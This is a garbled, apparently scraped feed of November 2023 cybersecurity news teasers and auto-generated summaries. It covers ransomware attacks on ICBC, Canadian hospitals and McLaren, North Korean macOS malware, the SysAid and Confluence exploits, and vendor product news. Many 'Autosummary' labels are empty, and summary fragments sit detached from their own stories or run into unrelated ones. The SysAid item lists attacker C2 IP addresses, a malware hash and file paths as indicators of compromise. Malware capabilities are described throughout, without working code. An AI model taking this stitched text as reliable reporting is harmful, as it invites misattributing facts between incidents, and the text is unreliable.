The McLaren operates 14 hospitals in Michigan, ambulatory surgery centers, imaging centers, a 490-member employed primary and specialty care physician network, commercial and Medicaid HMOs covering more than 732,838 lives in Michigan and Indiana, home health, infusion and hospice providers, pharmacy services, a clinical laboratory network and a wholly owned medical malpractice insurance company. BlackCat/ALPHV ransomware gang has been active since November 2021, the list of its victims is long and includes industrial explosives manufacturer SOLAR INDUSTRIES INDIA, the US defense contractor NJVC, gas pipeline Creos Luxembourg S.A., the fashion giant Moncler, the Swissport, NCR, and Western Digital. "When managing anti-money laundering (AML) obligations, many challenger banks turn to basic or unproven in-house risk management solutions. Although these solutions can, in some ways, be innovative, they are often built quickly and lack thorough testing, leading to potential vulnerabilities. In this Help Net Security video, Simon McClive, General Manager of Labyrinth Screening at Ripjar, discusses how compliance requires organizations to devise and implement high-quality processes, and getting it right is non-negotiable. Regulators are rightly … More
The post Unpacking the challenges of anti-money laundering obligations appeared first on Help Net Security.
"Autosummary:
"While organizations are slashing budgets across other departments, IT and security budgets are growing to address evolving IT infrastructure and rising threats from new tactics such as AI-based attacks, according to Axonius. Budget growth in IT and security In fact, 74% of IT and security decision makers said their organization’s IT or security budget increased compared to the year prior, and 63% said their organization’s IT or security team headcount increased. However, for those that … More
The post Most cybersecurity investments aren’t used to their full advantage appeared first on Help Net Security.
"Autosummary:
Budget growth in IT and security In fact, 74% of IT and security decision makers said their organization’s IT or security budget increased compared to the year prior, and 63% said their organization’s IT or security team headcount increased. "Autosummary:
"Autosummary:
Inside the ISO file there were at least the following three files: “lun.vbs”, which runs n.bat “n.bat”, which likely runs the native scilc.exe utility “s1.txt”, which likely contains the unauthorized MicroSCADA commands The researcher found that the lun.vbs script had a September 23 timestamp, which suggests that the hackers had about two months to develop their OT capability since the initial access stage. "The largest and oldest bank in Russia Sberbank faced the record-breaking DDoS attack that reached 1 million RPS. Sberbank , the Russian banking and financial services giant, announced that it was recently hit by a record-breaking distributed denial of service (DDoS) attack that reached 1 million RPS. After the invasion of Ukraine, most Russian organizations […]
The post The largest Russian bank Sberbank hit by a massive DDoS attack appeared first on Security Affairs.
"Autosummary:
That is, some new, very qualified criminals appeared on the market who began to systematically attack the largest Russian resources,” Gref said that Sberbank faces about ten attacks per month, but threat actors have never breached the systems at the bank.The largest Russian bank Sberbank hit by a massive DDoS attack Pierluigi Paganini November 09, 2023 November 09, 2023 The largest and oldest bank in Russia Sberbank faced the record-breaking DDoS attack that reached 1 million RPS. "Autosummary:
"Autosummary:
SysAid"s report provides indicators of compromise that could help detect or prevent the intrusion, which consist in filenames and hashes, IP addresses, file paths used in the attack, and commands the threat actor used to download malware or to delete evidence of initial access. "Autosummary:
Loader C2 45.182.189.100 GraceWire Loader C2 179.60.150.34 Cobalt Strike C2 45.155.37.105 Meshagent remote admin tool C2 Malwarebytes blocks the Cobalt Strike C2 179.60.150.34 File Paths: C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war C:\Program Files\SysAidServer\tomcat\webapps\leave How to avoid ransomware Block common forms of entry.Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. IOCs File: b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d Malicious loader IPs: 81.19.138.52 GraceWire "A critical zero-day vulnerability (CVE-2023-47246) in the SysAid IT support and management software solution is being exploited by Lace Tempest, a ransomware affiliate known for deploying Cl0p ransomware. Lace Tempest has previously exploited zero-day vulnerability (CVE-2023-34362) in Progress Software’s MOVEit Transfer installations to steal data from many enterprises and public sector organizations. The group has also similarly leveraged zero days in the Accellion file transfer appliance and Fortra’s GoAnywhere file transfer solution. CVE-2023-47246 exploited The … More
The post MOVEit hackers leverage new zero-day bug to breach organizations (CVE-2023-47246) appeared first on Help Net Security.
"Autosummary:
The latter injected the GraceWire trojan into various processes (spoolsv.exe, msiexec.exe and svchost.exe) “This is typically followed by human-operated activity, including lateral movement, data theft, and ransomware deployment,” the Microsoft Threat Intelligence team noted. "Flaws in the vulnerability disclosure process of open-source projects could be exploited by attackers to harvest the information needed to launch attacks before patches are made available, Aqua Security researchers worry. The risk arises from “half-day” and “0.75-day” vulnerabilities “Half-day” vulnerabilities are known to the maintainer and information about them is publicly exposed on GitHub or the National Vulnerability Database, but there’s still no official fix. “0.75-day” vulnerabilities have an official fix, but not a … More
The post Open-source vulnerability disclosure: Exploitable weak spots appeared first on Help Net Security.
"Autosummary:
The risk arises from “half-day” and “0.75-day” vulnerabilities “Half-day” vulnerabilities are known to the maintainer and information about them is publicly exposed on GitHub or the National Vulnerability Database, but there’s still no official fix. "US CISA added the vulnerability CVE-2023-29552 in the Service Location Protocol (SLP) to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability CVE-2023-29552 (CVSS score: 7.5) in the Service Location Protocol (SLP) to its Known Exploited Vulnerabilities catalog. The Service Location Protocol (SLP) is a legacy service discovery protocol that allows computers and other devices to […]
The post CISA adds SLP flaw to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
Most of vulnerable SLP instances are in the U.S., the U.K., Japan, Germany, Canada, France, Italy, Brazil, the Netherlands, and Spain. "Autosummary:
ICBC is China"s largest bank and the largest commercial bank in the world by revenue, with revenue of $214.7 billion and profits of $53.5 billion reported in 2022, according to Fortune. "Autosummary:
"As of June 2023, the Silent Ransom Group (SRG), also called Luna Moth, conducted callback phishing data theft and extortion attacks by sending victims a phone number in a phishing attempt, usually relating to pending charges on the victims" account," FBI said. "Mandiant reported that Russia-linked Sandworm APT used a novel OT attack to cause power outages during mass missile strikes on Ukraine. Mandiant researchers reported that Russia-linked APT group Sandworm employed new operational technology (OT) attacks that caused power outages while the Russian army was conducting mass missile strikes on critical infrastructure in Ukraine in October. […]
The post Russian Sandworm disrupts power in Ukraine with a new OT attack appeared first on Security Affairs.
"Autosummary:
In 2022, the Russian APT used multiple wipers in attacks aimed at Ukraine,including AwfulShred, CaddyWiper, HermeticWiper, Industroyer2, IsaacWiper, WhisperGate, Prestige, RansomBoggs, and ZeroWipe. The Sandworm group (aka BlackEnergy, UAC-0082, Iron Viking, Voodoo Bear, and TeleBots) has been active since 2000, it operates under the control of Unit 74455 of the Russian GRU’s Main Center for Special Technologies (GTsST). "Autosummary:
"Autosummary:
“On March 30, 2023, KAVX experienced a cybersecurity incident affecting servers located in Greenville and Myrtle Beach, South Carolina, USA, which resulted in the encryption of a limited number of systems and temporary disruption of certain services,” reads the notice. "Autosummary:
"On November 8, 2023, U.S. Eastern Time (November 9, 2023, Beijing Time), ICBC Financial Services (FS) experienced a ransomware attack that resulted in disruption to certain FS systems. "Autosummary:
Malicious app’s initial interface If the abovementioned permissions are granted, the Kamran spyware automatically gathers sensitive user data, including: SMS messages contacts list call logs calendar events device location list of installed apps received SMS messages device info images Interestingly, Kamran identifies accessible image files on the device (as depicted in Figure 8), obtains the file paths for these images, and stores this data in an images_db database, as demonstrated in Figure 9. Upon launching, Kamran prompts the user to grant permissions for accessing various data stored on the victim’s device, such as contacts, calendar events, call logs, location information, device files, SMS messages, and images.If accepted, it gathers data about contacts, calendar events, call logs, location information, device files, SMS messages, images, etc. The region, with a population of around 1.5 million, is famous for the presence of some of the highest mountains globally, hosting five of the esteemed “eight-thousanders” (mountains that peak at more than 8,000 meters above sea level), most notably K2, and is therefore frequently visited by international tourists, trekkers, and mountaineers. Prior to 2022, this online newspaper also used another domain, hunzanews.com, as indicated in the page transparency information on the site’s Facebook page (see Figure 2) and the Internet Archive records of hunzanews.com, Internet Archive data also shows that hunzanews.com had been delivering news since 2013; therefore, for around five years, this online newspaper was publishing articles via two websites: hunzanews.net and hunzanews.com.Hunza News after redesign with no option to download an app Based on Internet Archive records, it is evident that at least since March 21st, 2023, the website reintroduced the option for users to download an Android app, accessible via the DOWNLOAD APP button, as depicted in Figure 5. "For SOC teams to be able to defend their organization against ransomware attacks, they need to have the right security toolset, but also an understanding of the three primary ransomware attack stages. In this article, we will dive into those key stages, look at how they unfold and what signs indicate an attack, and review what can be done to mitigate any damage. When it comes to ransomware attacks, most of the time there isn’t … More
The post The 3 key stages of ransomware attacks and useful indicators of compromise appeared first on Help Net Security.
"Autosummary:
It requires identifying strange or out-of-the-ordinary user and entity behavior across the network, such as accessing files outside their scope of work, installing external non-company approved software on the network, looking at DNS queries, and more.Other indicators of compromise include: Accessing website infrastructure Looking for specific DNS addresses Connecting to external cloud services like Dropbox Again, these signs can be difficult to distinguish because these actions may look like they are being made by someone who has authorized access to sensitive data, but is actually a hacker imitating them on the network. Once hackers gain access to a database with a lot of sensitive information or have control over the network, attackers will begin deploying software like PuTTY across different areas, further establishing their foothold and creating backups for their ransomware in case they are detected. "Cloud computing carries many benefits for your business… as long as you can ensure the performance and availability of your cloud environments. Let’s take the following three cloud computing benefits as examples. Rapidly scale cloud services: In the absence of performance and availability, you can’t reliably scale your cloud computing services to fit your needs. This means that your organization could miss out on taking advantage of certain resources, or it might need to pay … More
The post Uphold Linux systems’ performance and availability in Azure appeared first on Help Net Security.
"Autosummary:
With this testing period over, Azure Monitor Agent is now validated for successful deployment and overall functionality (e2e data flow for all data types) on images for the following CIS Benchmarks: CIS Red Hat Enterprise Linux 7 Benchmark Level 1 CIS Red Hat Enterprise Linux 7 Benchmark Level 2 CIS Red Hat Enterprise Linux 8 Benchmark Level 1 CIS Red Hat Enterprise Linux 8 Benchmark Level 2 CIS Ubuntu Linux 20.04 LTS Benchmark Level 1 CIS CentOSLinux 7 Benchmark Level 1 CIS Debian Linux 10 Benchmark Level 1 CIS Oracle Linux 8 Benchmark Level 1 What’s more, the Azure team has integrated CIS Hardened Images into the pre-release validation process for continual re-validation when new AMA versions become available. "Autosummary:
According to a report Group-IB shared with BleepingComputer, the threat actor has several usernames (e.g. farnetworkl, jingo, jsworm, razvrat, piparkuka, and farnetworkitand) and has been active on multiple Russian-speaking hacker forums trying to recruit affiliates for various ransomware operations. "Autosummary:
The attack against IT service provider TransForm, which took place on October 23, resulted in outages in IT systems at Windsor Regional Hospital, Erie Shores HealthCare, Hôtel-Dieu Grace Healthcare, Bluewater Health and Chatham-Kent Health Alliance, leaving patients facing appointment delays and cancelled surgeries. "Autosummary:
"Throughout the threat actor"s cybercriminal career, which began in 2019, farnetwork has been involved in several connected ransomware projects, including JSWORM, Nefilim, Karma, and Nemty, as part of which they helped develop ransomware and manage the RaaS programs before launching their own RaaS program based on Nokoyawa ransomware," Nikolay Kichatov, threat intelligence analyst at Group-IB, said. "The North Korea-linked APT BlueNoroff used a new strain of macOS malware strain dubbed ObjCShellz, Jamf Threat Labs reported. Researchers from Jamf Threat Labs discovered a new macOS malware strain dubbed ObjCShellz and attributed it to North Korea-linked APT BlueNoroff. The experts noticed that the ObjCShellz malware shares similarities with the RustBucket malware campaign associated with the BlueNoroff APT […]
The post North Korea-linked APT BlueNoroff used new macOS malware ObjCShellz appeared first on Security Affairs.
"Autosummary:
North Korea-linked APT BlueNoroff used new macOS malware ObjCShellz Pierluigi Paganini November 08, 2023 November 08, 2023 The North Korea-linked APT BlueNoroff used a new strain of macOS malware strain dubbed ObjCShellz, Jamf Threat Labs reported. "Kasten by Veeam has announced the release of its new Kasten K10 V6.5 platform for Kubernetes. The new release introduces trusted container environments, enhanced ransomware protection and data protection support for large-scale Kubernetes environments. As part of the new cloud native security innovations in Kasten K10 V6.5, organizations now have access to ransomware protection advances that allow for integrations with SIEM (Datadog) to proactively detect security attacks along with an extended audit log backend that … More
The post Kasten K10 V6.5 improves ransomware and data protection for Kubernetes environments appeared first on Help Net Security.
"Autosummary:
Additionally, support for Iron Bank, Platform One’s source, now provides hardened federal container registry, to ensure application and data security against a variety of threat factors and guarantees that organizations can comply with regulatory and legal fiats. “Kasten by Veeam’s new security advancements puts it at features-parity, and in some cases, even above what traditional data protection products can currently do,” said Johnny Yu, research manager at IDC. "SUSE released Rancher Prime 2.0, enhancing customers’ ability to manage heterogeneous, multi-cloud Kubernetes deployments securely and at scale. SUSE also revealed updates to Rancher community edition, SLE Micro 5.5 and the future of SUSE Edge. The latest updates continue to meet the diverse needs of the developer while furthering SUSE’s mission to provide choice. “With Rancher Prime we continue our focus on enhancing customer productivity by providing a simple and secure container management experience for … More
The post SUSE boosts cloud native portfolio to enhance customer productivity appeared first on Help Net Security.
"Autosummary:
“With Rancher Prime we continue our focus on enhancing customer productivity by providing a simple and secure container management experience for their entire infrastructure including data center, multiple clouds, and the Edge,” said Peter Smails, general manager of Enterprise Container Management, SUSE. Helping customers get more value from Kubernetes with Rancher Prime 2.0 Interoperable by design, Rancher Prime 2.0, SUSE’s commercial enterprise subscription, delivers even more value and support for customers: Tighter portfolio integration and new UI extensions (UIE): UI extensions simplify operations and enhance user productivity by building in the functionality of SUSE and third-party tools directly into the Rancher Prime UI. "Autosummary:
"Five Canadian hospitals were victims of a ransomware attack, threat actors claim to have stolen data from them and leaked them. Five Canadian hospitals revealed they were victims of ransomware attacks after threat actors leaked alleged stolen data. The impacted hospitals are Bluewater Health, Chatham-Kent Health Alliance, Erie Shores HealthCare, Hôtel-Dieu Grace Healthcare, and Windsor […]
The post Five Canadian Hospitals impacted by a ransomware attack on TransForm provider appeared first on Security Affairs.
"Autosummary:
In October, CISA, the FBI, and the Department of Health and Human Services (HHS) warned that the Daixin Team cybercrime group is actively targeting U.S. businesses, mainly in the Healthcare and Public Health (HPH) Sector, with ransomware operations.Exposed data Includes names, addresses, social insurance numbers, gender, marital status, date of birth, and rates of pay. "Autosummary:
A more recent blow sufferend by Russia’s financial system concerns the National Payment Card System (NSPK), the Mir card operator, whose website became unavailable on October 30, 2023, and was later defaced to post messages about a client-impacting data breach. "Autosummary:
"New trends included ransomware actors exploiting vulnerabilities in vendor-controlled remote access to casino servers, and companies victimized through legitimate system management tools to elevate network permissions," the agency explains. "Phosphorus has integrated with Check Point to provide the asset-centric xIoT visibility at the network level. Phosphorus’s Intelligent Active Discovery (IAD) engine and device posture assessment capabilities are able to enrich network-centric technologies with previously unseen levels of high-resolution xIoT device detail, granular risk assessment context, and deep device metadata. This enables organizations to centralize visibility for all of their xIoT assets and facilitate decision-making in the Check Point security infrastructure. Phosphorus uses native device … More
The post Phosphorus and Check Point integrate to provide xIoT visibility and protection appeared first on Help Net Security.
"Autosummary:
Key integration benefits for customers include: xIoT visibility: Powered by Phosphorus’s IAD engine, the new integration utilizes the industry’s most advanced xIoT discovery capability which is 98% faster than traditional passive scanners, 95% more efficient (lighter) and provides 100% device certainty the first time. Powered by Phosphorus’s IAD engine, the new integration utilizes the industry’s most advanced xIoT discovery capability which is 98% faster than traditional passive scanners, 95% more efficient (lighter) and provides 100% device certainty the first time. Advanced risk posture view: Phosphorus’s evidence-based risk assessment capability collects over 3X more data points from xIoT assets than other services – including deep detail on devices running with default passwords, insecure configurations, vulnerable or outdated firmware, and more. "The FBI published a PIN alert warning of ransomware operators compromising third-party vendors and services for initial access to target environments. The Federal Bureau of Investigation (FBI) published a Private Industry Notification (PIN) to warn of ransomware initial access trends and provide recommendations to reduce the attack surface to ransomware attacks. As of July 2023, […]
The post FBI: Ransomware actors abuse third parties and legitimate system tools for initial access appeared first on Security Affairs.
"Autosummary:
To be prepared for cyber incidents, organizations should maintain offline backups of data, and regularly maintain backup and restoration, ensure all backup data is encrypted, immutable and cover the entire organization’s data infrastructure, and ensure their backup data is not already infected. "Autosummary:
"The number of ransomware attacks (successful and unsuccessful) has doubled over the past two years, from 43 on average in 2021 to 86 in 2023, according to Akamai. Security organizations have responded to the recent rise in ransomware attacks by implementing zero trust and microsegmentation strategies. 99% of respondents who reported that they have deployed some form of segmentation have also deployed a zero trust security framework. Zero trust and microsegmentation Respondents overwhelmingly agreed that … More
The post Microsegmentation proves its worth in ransomware defense appeared first on Help Net Security.
"Autosummary:
Globally, the top obstacles to deploying microsegmentation are a lack of skills/expertise (39%) followed by increased performance bottlenecks (39%), and compliance requirements (38%). "Kinsing threat actors have been spotted exploiting the recently disclosed Looney Tunables (CVE-2023-4911) vulnerability to covertly install cryptomining software into cloud-native environments. Kinsing (aka Money Libra) is a threat actor group that has been active since late 2021, targeting cloud-native environments and applications – Kubernetes clusters, Docker API, Redis, Jenkins and Openfire servers, cloud-hosted Apache NiFi instances, and so on – to deploy cryptominers. Kinsing exploiting PHPUnit and Looney Tunables vulnerabilities In this latest attack … More
The post Looney Tunables bug exploited for cryptojacking appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
There are ransomware gangs, crypto-scammers, Advanced Persistent Threat groups, data exfiltration and extortion schemes, big-money exploits, disastrous zero-days, brute force attacks, Living-Off-the-Land techniques—that anti-virus detection doesn’t find—and fast evolving social engineering tactics that will only advance with the broad availability of generative AI.Removing it was a team effort, and it led to the creation of the first iteration of Malwarebytes, a free tool built to help everyday people find and remove malware from their computers, without needing to scour forums, write code, or run scripts like I had. "Malwarebytes launched ThreatDown, the product family that protects IT-constrained organizations with effective, easy-to-use cybersecurity. Formerly named Malwarebytes for Business, ThreatDown solutions are purpose-built to overpower threats, while empowering IT, through easy-to-use, effective technologies like the new Security Advisor dashboard and ThreatDown Bundles that combine the technologies and services needed to protect organizations from today’s sophisticated cyber landscape. Today, the company has two business units operating under the Malwarebytes executive leadership team to best serve its … More
The post Malwarebytes ThreatDown helps organizations to overpower threats appeared first on Help Net Security.
"Autosummary:
Formerly named Malwarebytes for Business, ThreatDown solutions are purpose-built to overpower threats, while empowering IT, through easy-to-use, effective technologies like the new Security Advisor dashboard and ThreatDown Bundles that combine the technologies and services needed to protect organizations from today’s sophisticated cyber landscape. "Autosummary:
"Autosummary:
"Currently observed campaigns leverage SEO-poisoned searches for themes such as contracts, legal forms, or other business-related documents, directing victims to compromised sites designed to look like legitimate forums where they are tricked into downloading the initial payload as an archive file," the researchers said. "Autosummary:
Securing The Against the Next Generation of Threats (2023 and beyond) 2023 marked our foray into Mobile Protection for iOS, Android, and Chromebook platforms, helping organizations crush mobile threats on iOS, Android, and ChromeOS. Managed Detection and Response (2022) Last year, we delved into a multitude of new services and tools, including Device Control, Vulnerability Assessment, Patch Management Modules, and many more. ThreatDown’s mission for businesses is straightforward: neutralize threats promptly and efficiently, without the need for extensive IT teams, prolonged setup times, or substantial budgets. "IRONSCALES announced its Fall ’23 Release, strengthening its foundational behavioral analysis with deep image-based detection capabilities to stop email attacks that bypass text analysis such as QR code phishing attacks (or quishing). Additionally, IRONSCALES released phishing simulation testing enhancements with the launch of Autonomous Campaigns, enabling security administrators to automate phishing simulation testing campaigns, making it easier and faster to train employees on the latest phishing attacks. These new capabilities provide better organizational protection and … More
The post IRONSCALES expands platform capabilities to improve employee phishing awareness appeared first on Help Net Security.
"Autosummary:
With the addition of deep image-based detection capabilities, IRONSCALES unites its foundational behavioral analysis with Optical Character Recognition (OCR), deep-text and image processing, and natural language models for comprehensive, multi-modal protection of image-based phishing threats. "The iconic integrated resort Marina Bay Sands in Singapore has disclosed a data breach that impacted 665,000 customers. The Marina Bay Sands (MBS) luxury resort in Singapore has suffered a data breach that impacted 665,000 customers. Marina Bay Sands discovered the security breach on 20 October 2023, an unauthorized third party gained access to some […]
The post Marina Bay Sands Luxury Hotel in Singapore Suffers a Data Breach appeared first on Security Affairs.
"Autosummary:
"Autosummary:
“Bluewater Health, Chatham-Kent Health Alliance, Erie Shores HealthCare, Hôtel-Dieu Grace Healthcare and Windsor Regional Hospital, and our shared service provider TransForm Shared Service Organization were recently the victims of a ransomware attack,” reads the statement “We did not pay a ransom and we are aware that data connected to the cyber incident has been published.” "Autosummary:
" Last year, Kaspersky linked the BlueNorOff hackers to a long string of attacks targeting cryptocurrency startups around the world, including in the U.S., Russia, China, India, the U.K., Ukraine, Poland, Czech Republic, UAE, Singapore, Estonia, Vietnam, Malta, Germany, and Hong Kong. "Autosummary:
"In the last two years, the average organization’s cybersecurity program was prepared to defend preventively, or block, just 57% of the cyberattacks it encountered, according to Tenable. This means 43% of attacks launched against them are successful and must be remediated after the fact. 58% of respondents say they focus almost entirely on fighting successful attacks rather than working to prevent them in the first place. The study finds that this is largely due to … More
The post The roadblocks to preventive cybersecurity success appeared first on Help Net Security.
"Autosummary:
In order, the highest perceived risks come from the use of public cloud (30%), multi-cloud and/or hybrid cloud (23%), private cloud infrastructure (12%) and cloud container management tools (9%). "Autosummary:
Ryuk, a predecessor to the Conti ransomware, first emerged on the threat landscape in 2018, and has compromised governments, academia, healthcare, manufacturing, and technology organizations worldwide. "Threat actors are trying to exploit CVE-2023-22518, a critical Atlassian Confluence flaw that allows unauthenticated attackers to reset vulnerable instances’ database, Greynoise is observing. The Shadowserver Foundation has also seen 30+ IP addresses testing for the flaw in internet-facing Confluence installations. From security updates to active exploitation Atlassian released security updates for CVE-2023-22518 on October 31 and urged customers to upgrade quickly, even though there was no indication that the vulnerability was being targeted. “Instances … More
The post Atlassian Confluence data-wiping vulnerability exploited appeared first on Help Net Security.
"Autosummary:
"Autosummary:
A lateral movement phase is followed by data exfiltration using a mix of public and custom tools like Sqlextractor, WinSCP, and PuTTY, and finally deliver the wiper malware - MultiLayer , a .NET malware that enumerates files for either deletion or corrupting them with random data to resist recovery efforts and render the system unusable by wiping the boot sector. "Autosummary:
Android Dropper-as-a-Service operations SecuriDropper infects Android devices posing as a legitimate app, most often impersonating a Google app, Android update, video player, security app, or a game, and then installing a second payload, which is some form of malware. "The recent breach of the Okta Support system was carried out via a compromised service account with permissions to view and update customer support cases. “During our investigation into suspicious use of this account, Okta Security identified that an employee had signed-in to their personal Google profile on the Chrome browser of their Okta-managed laptop. The username and password of the service account had been saved into the employee’s personal Google account,” David Bradbury, Chief … More
The post Okta breach post mortem reveals weaknesses exploited by attackers appeared first on Help Net Security.
"Autosummary:
To prevent similar attacks in the future, they: Implemented a configuration option within Chrome Enterprise that prevents employees from signing in to Chrome on their Okta-managed laptop using a personal Google profile Deployed additional detection and monitoring rules for the customer support system, and Implemented session token binding based on network location, so that stolen/compromised Okta administrator session tokens can’t be used by unauthorized users “Okta administrators are now forced to re-authenticate if we detect a network change. "Autosummary:
"Autosummary:
CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) issued a joint advisory last month, urging network administrators to immediately secure Atlassian Confluence servers against the actively exploited CVE-2023-22515 privilege escalation bug, which has been under active exploitation since at least September 14, according to a Microsoft report. "Autosummary:
"Autosummary:
"Autosummary:
Cybersecurity firm Bitsight, which revealed details of the service last week, said it identified at least 53 servers related to the botnet that are distributed across France, Bulgaria, Netherlands, and Sweden. "Experts warn threat actors that started exploiting a recent critical flaw CVE-2023-22518 in Confluence Data Center and Confluence Server. Over the weekend threat actors started exploiting a recently disclosed vulnerability (CVE-2023-22518) in all versions of Atlassian Confluence Data Center and Confluence Server. Atlassian last week warned of the CVE-2023-22518 (CVSS score 9.1), the issue is an […]
The post Critical Confluence flaw exploited in ransomware attacks appeared first on Security Affairs.
"Autosummary:
The vulnerability was addressed with the release of the following versions: 7.19.16 or later 8.3.4 or later 8.4.4 or later 8.5.3 or later, and 8.6.1 or later Atlassian states that there is no impact on confidentiality as an attacker cannot exfiltrate any instance data. "Autosummary:
"Autosummary:
CVE-2017-9841 exploitation (AquaSec) Exploiting the PHPUnit flaw (CVE-2017-9841) leads to opening a reverse shell over port 1337 on the compromised system, which Kinsing operators leverage to execute reconnaissance commands like "uname -a" and "passwrd." "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: AI threat landscape: Model theft and inference attacks emerge as top concerns In this Help Net Security interview, Guy Guzner, CEO at Savvy, discusses the challenges and opportunities presented by in-house AI models, the security landscape surrounding them, and the future of AI cybersecurity. A closer look at healthcare’s battle with AI-driven attacks In this Help Net Security interview, Troy … More
The post Week in review: Exploited Citrix Bleed vulnerability, Atlassian patches critical Confluence bug appeared first on Help Net Security.
"Autosummary:
Infosec products of the month: October 2023 Here’s a look at the most interesting products from the past month, featuring releases from: Appdome, Arcitecta, AuditBoard, BackBox, Cloaked, ComplyCube, Darktrace, Data Theorem, Flexxon, Fortanix, Fortinet, Jumio, LogicMonitor, Malwarebytes, ManageEngine, Nutanix, Prevalent, Progress, SailPoint, Thales, Vanta, Veriff, and Wazuh.Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: AI threat landscape: Model theft and inference attacks emerge as top concerns In this Help Net Security interview, Guy Guzner, CEO at Savvy, discusses the challenges and opportunities presented by in-house AI models, the security landscape surrounding them, and the future of AI cybersecurity. "North Korea-linked Lazarus group is using new KandyKorn macOS Malware in attacks against blockchain engineers. North Korea-linked Lazarus APT group were spotted using new KandyKorn macOS malware in attacks against blockchain engineers, reported Elastic Security Labs. “KandyKorn is an advanced implant with a variety of capabilities to monitor, interact with, and avoid detection. It utilizes […]
The post Lazarus targets blockchain engineers with new KandyKorn macOS Malware appeared first on Security Affairs.
"Autosummary:
The malware supports multiple capabilities such as harvesting information, listing directories and running processes, downloading files, uploading files, archiving directories and exfiltrating them, killing processes, executing commands using a terminal, spawning a shell, downloading a configuration from the server, sleeping, and exiting. "The Treasury Department sanctioned a Russian woman accused of laundering virtual currency on behalf of cybercriminals. The Department of the Treasury’s Office of Foreign Assets Control (OFAC) on Friday sanctioned Ekaterina Zhdanova, a Russian national, for her role in laundering and managing virtual currency on behalf of Russian elites, ransomware operators, and other threat actors. “Through […]
The post US govt sanctioned a Russian woman for laundering virtual currency on behalf of threat actors appeared first on Security Affairs.
"Autosummary:
“Through key facilitators like Zhdanova, Russian elites, ransomware groups, and other illicit actors sought to evade U.S. and international sanctions, particularly through the abuse of virtual currency,” said Under Secretary of the Treasury for Terrorism and Financial Intelligence Brian E. Nelson. "Autosummary:
"The threat actor was able to use these session tokens to hijack the legitimate Okta sessions of 5 customers," Okta"s Chief Security Officer, David Bradbury, said. "Autosummary:
According to Trellix"s data, various malware families, including Agent Tesla, UmbralStealer, Stealerium, and zgRAT, have also used Discord webhooks over the past few years to steal sensitive information like credentials, browser cookies, and cryptocurrency wallets from compromised devices. "Autosummary:
On Linux, persistence is accomplished by means of a systemd user service, autostarted .desktop file, or by modifying /etc/rc*, profile, bashrc, or inittab files. "It comes equipped with a built-in TOR network tunnel for communication with command servers, along with update and delivery functionality through trusted services such as GitLab, GitHub, and Bitbucket, all using custom encrypted archives. "Autosummary:
"The email threat landscape is experiencing a profound transformation, adapting to new challenges and exploiting emerging vulnerabilities with speed and sophistication. In this Help Net Security video, Usman Choudhary, CPTO at VIPRE Security Group, discusses how cybercriminals modify their tactics to align with shifting consumer behaviors while taking advantage of technological advancements to carry out their activities and elude capture.
The post How cybercriminals adapt and thrive amidst changing consumer trends appeared first on Help Net Security.
"Autosummary:
"The rate of data encryption following a ransomware attack in healthcare was the highest in the last three years, according to Sophos. Ransomware attacks continue to grow in sophistication Among those organizations surveyed, cybercriminals successfully encrypted data in nearly 75% of ransomware attacks. This is the highest rate of encryption in the past three years and a significant increase from the 61% of healthcare organizations that reported having their data encrypted last year. In addition, … More
The post Healthcare’s road to redefining cybersecurity with modern solutions appeared first on Help Net Security.
"Autosummary:
What’s more, this number is declining, which suggests the sector is actively losing ground against cyberattackers and is increasingly unable to detect and stop an attack in progress,” said Chester Wisniewski, director, field CTO, Sophos.All organizations, especially those in healthcare, need to modernize their defensive approach to cybercrime, moving from being solely preventative to actively monitoring and investigating alerts 24/7 and securing outside help in the form of services like managed detection and response (MDR),” concluded Wisniewski. "The security performance of financial applications generally outperforms other industries, with automation, targeted security training, and scanning via Application Programming Interface (API) contributing to a year-over-year reduction in the percentage of applications containing flaws, according to Veracode. Against a backdrop of major regulations impacting the financial services sector, including the U.S. Securities and Exchange Commission cybersecurity disclosure rules and the E.U. Digital Operational Resilience Act (DORA), Veracode’s study provides recommendations to reduce risk from software … More
The post Financial organizations embrace automation for enhanced security appeared first on Help Net Security.
"Autosummary:
The security performance of financial applications generally outperforms other industries, with automation, targeted security training, and scanning via Application Programming Interface (API) contributing to a year-over-year reduction in the percentage of applications containing flaws, according to Veracode. "While 86% of compliance, operations, risk and IT professionals at banks and non-banking financial institutions (NBFIs) surveyed said they would increase spending on AI and ML over the next two years, a 93% of respondents said that instead of using automation to reduce staff, they would focus that extra capacity on strategies to manage risk and grow the business, according to WorkFusion. “Leveraging AI-enabled automation technology to enhance efficiency and productivity can help alleviate capacity … More
The post AI is transforming financial crime compliance appeared first on Help Net Security.
"Autosummary:
While 86% of compliance, operations, risk and IT professionals at banks and non-banking financial institutions (NBFIs) surveyed said they would increase spending on AI and ML over the next two years, a 93% of respondents said that instead of using automation to reduce staff, they would focus that extra capacity on strategies to manage risk and grow the business, according to WorkFusion. "Autosummary:
"North Korean hackers are using novel MacOS malware named KandyKorn to target blockchain engineers of a cryptocurrency exchange platform. The attack By impersonating blockchain engineering community members on Discord, the attackers used social engineering techniques to make victims download a malicious ZIP file. The victims believe they are installing an arbitrage bot, i.e., crypto trading software, but they end up downloading a Python file (Main.py), which downloads and executes Watcher.py, which is used for staging … More
The post KandyKorn macOS malware lobbed at blockchain engineers appeared first on Help Net Security.
"Autosummary:
The victims believe they are installing an arbitrage bot, i.e., crypto trading software, but they end up downloading a Python file (Main.py), which downloads and executes Watcher.py, which is used for staging the system for further downloads. "Autosummary:
"Autosummary:
""Roblox" users can be targeted by scammers (known as "beamers" by "Roblox" players) who attempt to steal valuable items or Robux from other players," security researcher Tiago Pereira said. "Autosummary:
